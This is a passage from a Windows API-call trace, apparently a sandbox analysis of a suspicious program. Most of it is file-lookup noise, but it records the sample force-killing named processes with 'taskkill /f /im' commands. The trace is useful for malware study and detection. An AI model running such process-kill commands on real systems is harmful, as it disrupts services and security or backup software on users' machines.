hTemplateFile=0x0) returned 0xffffffff [0169.978] GetFileAttributesExW (in: lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0x124500a8 | out: lpFileInformation=0x124500a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0169.978] CreateFileW (lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0169.978] GetFileAttributesExW (in: lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), fInfoLevelId=0x0, lpFileInformation=0x124500f8 | out: lpFileInformation=0x124500f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0169.978] CreateFileW (lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0169.978] GetFileAttributesExW (in: lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0x12450148 | out: lpFileInformation=0x12450148*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0169.978] CreateFileW (lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0169.978] GetFileAttributesExW (in: lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0x12450198 | out: lpFileInformation=0x12450198*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0169.978] CreateFileW (lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0169.978] GetFileAttributesExW (in: lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0x124501e8 | out: lpFileInformation=0x124501e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0169.979] CreateFileW (lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0169.979] GetFileAttributesExW (in: lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0x12450238 | out: lpFileInformation=0x12450238*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0169.979] CreateFileW (lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0169.979] GetEnvironmentVariableW (in: lpName="path", lpBuffer=0x123e91e0, nSize=0x64 | out: lpBuffer="") returned 0x63 [0169.979] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x12450288 | out: lpFileInformation=0x12450288*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0169.979] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x123e92b0, nSize=0x64 | out: lpBuffer="") returned 0x35 [0169.979] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x124502d8 | out: lpFileInformation=0x124502d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0169.979] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x144 [0169.980] GetConsoleMode (in: hConsoleHandle=0x144, lpMode=0x123a3a7c | out: lpMode=0x123a3a7c) returned 0 [0169.980] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0169.980] GetConsoleMode (in: hConsoleHandle=0x138, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0169.980] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0169.980] GetConsoleMode (in: hConsoleHandle=0x134, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0169.980] GetEnvironmentStringsW () returned 0x8ea900* [0169.981] FreeEnvironmentStringsW (penv=0x8ea900) returned 1 [0169.981] GetCurrentProcess () returned 0xffffffff [0169.981] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x144, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x12456150, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x12456150*=0x154) returned 1 [0169.981] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x138, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x12456154, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x12456154*=0x158) returned 1 [0169.981] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x12456158, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x12456158*=0x130) returned 1 [0169.981] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="cmd.exe /c \"taskkill /f /im mydesktopservice.exe \"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x400, lpEnvironment=0x12444a80, lpCurrentDirectory=0x0, lpStartupInfo=0x123a3aa4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x154, hStdOutput=0x158, hStdError=0x130), lpProcessInformation=0x123a3a80 | out: lpCommandLine="cmd.exe /c \"taskkill /f /im mydesktopservice.exe \"", lpProcessInformation=0x123a3a80*(hProcess=0x140, hThread=0x13c, dwProcessId=0xd3c, dwThreadId=0x7a0)) returned 1 [0170.130] SetEvent (hEvent=0x150) returned 1 [0170.130] CloseHandle (hObject=0x13c) returned 1 [0170.131] CloseHandle (hObject=0x130) returned 1 [0170.131] CloseHandle (hObject=0x158) returned 1 [0170.131] CloseHandle (hObject=0x154) returned 1 [0170.131] CloseHandle (hObject=0x144) returned 1 [0170.131] CloseHandle (hObject=0x138) returned 1 [0170.131] CloseHandle (hObject=0x134) returned 1 [0170.132] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0xffffffff) returned 0x0 [0171.897] SetEvent (hEvent=0x150) returned 1 [0171.897] GetExitCodeProcess (in: hProcess=0x140, lpExitCode=0x123a3bb4 | out: lpExitCode=0x123a3bb4*=0x80) returned 1 [0171.898] GetProcessTimes (in: hProcess=0x140, lpCreationTime=0x1242b480, lpExitTime=0x1242b488, lpKernelTime=0x1242b490, lpUserTime=0x1242b498 | out: lpCreationTime=0x1242b480, lpExitTime=0x1242b488, lpKernelTime=0x1242b490, lpUserTime=0x1242b498) returned 1 [0171.898] CloseHandle (hObject=0x140) returned 1 [0171.898] SetEvent (hEvent=0x128) returned 1 [0171.898] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x5) returned 0x102 [0171.917] SetEvent (hEvent=0x150) returned 1 [0171.917] SetEvent (hEvent=0x128) returned 1 [0171.917] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x123bb380, nSize=0x64 | out: lpBuffer="") returned 0x35 [0171.918] GetFileAttributesExW (in: lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x12446378 | out: lpFileInformation=0x12446378*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0171.918] CreateFileW (lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0171.919] GetFileAttributesExW (in: lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), fInfoLevelId=0x0, lpFileInformation=0x124463c8 | out: lpFileInformation=0x124463c8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0171.919] CreateFileW (lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0171.919] GetFileAttributesExW (in: lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0x12446418 | out: lpFileInformation=0x12446418*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0171.919] CreateFileW (lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0171.919] GetFileAttributesExW (in: lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0x12446468 | out: lpFileInformation=0x12446468*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0171.920] CreateFileW (lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0171.920] GetFileAttributesExW (in: lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x124464b8 | out: lpFileInformation=0x124464b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0171.920] CreateFileW (lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0171.920] GetFileAttributesExW (in: lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0x12446508 | out: lpFileInformation=0x12446508*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0171.920] CreateFileW (lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0171.920] GetFileAttributesExW (in: lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0x12446558 | out: lpFileInformation=0x12446558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0171.920] CreateFileW (lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0171.920] GetFileAttributesExW (in: lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), fInfoLevelId=0x0, lpFileInformation=0x124465a8 | out: lpFileInformation=0x124465a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0171.920] CreateFileW (lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0171.921] GetFileAttributesExW (in: lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0x124465f8 | out: lpFileInformation=0x124465f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0171.921] CreateFileW (lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0171.921] GetFileAttributesExW (in: lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0x12446648 | out: lpFileInformation=0x12446648*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0171.921] CreateFileW (lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0171.921] GetFileAttributesExW (in: lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0x12446698 | out: lpFileInformation=0x12446698*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0171.921] CreateFileW (lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0171.921] GetFileAttributesExW (in: lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0x124466e8 | out: lpFileInformation=0x124466e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0171.921] CreateFileW (lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0171.921] GetEnvironmentVariableW (in: lpName="path", lpBuffer=0x123bb450, nSize=0x64 | out: lpBuffer="") returned 0x63 [0171.921] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x12446738 | out: lpFileInformation=0x12446738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0171.922] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x123bb520, nSize=0x64 | out: lpBuffer="") returned 0x35 [0171.922] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x12446788 | out: lpFileInformation=0x12446788*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0171.922] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0171.922] GetConsoleMode (in: hConsoleHandle=0x140, lpMode=0x123a3a7c | out: lpMode=0x123a3a7c) returned 0 [0171.922] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0171.922] GetConsoleMode (in: hConsoleHandle=0x134, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0171.922] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0171.922] GetConsoleMode (in: hConsoleHandle=0x138, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0171.922] GetEnvironmentStringsW () returned 0x8ea900* [0171.923] FreeEnvironmentStringsW (penv=0x8ea900) returned 1 [0171.923] GetCurrentProcess () returned 0xffffffff [0171.923] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x140, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x12448660, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x12448660*=0x144) returned 1 [0171.923] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x12448664, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x12448664*=0x154) returned 1 [0171.923] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x138, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x12448668, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x12448668*=0x158) returned 1 [0171.924] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="cmd.exe /c \"taskkill /f /im ocautoupds.exe \"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x400, lpEnvironment=0x1243d500, lpCurrentDirectory=0x0, lpStartupInfo=0x123a3aa4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x144, hStdOutput=0x154, hStdError=0x158), lpProcessInformation=0x123a3a80 | out: lpCommandLine="cmd.exe /c \"taskkill /f /im ocautoupds.exe \"", lpProcessInformation=0x123a3a80*(hProcess=0x13c, hThread=0x130, dwProcessId=0x134c, dwThreadId=0x1350)) returned 1 [0172.038] SetEvent (hEvent=0x150) returned 1 [0172.038] CloseHandle (hObject=0x130) returned 1 [0172.038] CloseHandle (hObject=0x158) returned 1 [0172.038] CloseHandle (hObject=0x154) returned 1 [0172.038] CloseHandle (hObject=0x144) returned 1 [0172.038] CloseHandle (hObject=0x140) returned 1 [0172.038] CloseHandle (hObject=0x134) returned 1 [0172.038] CloseHandle (hObject=0x138) returned 1 [0172.039] WaitForSingleObject (hHandle=0x13c, dwMilliseconds=0xffffffff) returned 0x0 [0174.430] SetEvent (hEvent=0x150) returned 1 [0174.431] GetExitCodeProcess (in: hProcess=0x13c, lpExitCode=0x123a3bb4 | out: lpExitCode=0x123a3bb4*=0x80) returned 1 [0174.431] GetProcessTimes (in: hProcess=0x13c, lpCreationTime=0x12423b40, lpExitTime=0x12423b48, lpKernelTime=0x12423b50, lpUserTime=0x12423b58 | out: lpCreationTime=0x12423b40, lpExitTime=0x12423b48, lpKernelTime=0x12423b50, lpUserTime=0x12423b58) returned 1 [0174.432] CloseHandle (hObject=0x13c) returned 1 [0174.432] SetEvent (hEvent=0x128) returned 1 [0174.433] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x4) returned 0x102 [0174.452] SetEvent (hEvent=0x150) returned 1 [0174.452] SetEvent (hEvent=0x128) returned 1 [0174.453] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x123e9450, nSize=0x64 | out: lpBuffer="") returned 0x35 [0174.454] GetFileAttributesExW (in: lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x12450328 | out: lpFileInformation=0x12450328*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0174.454] 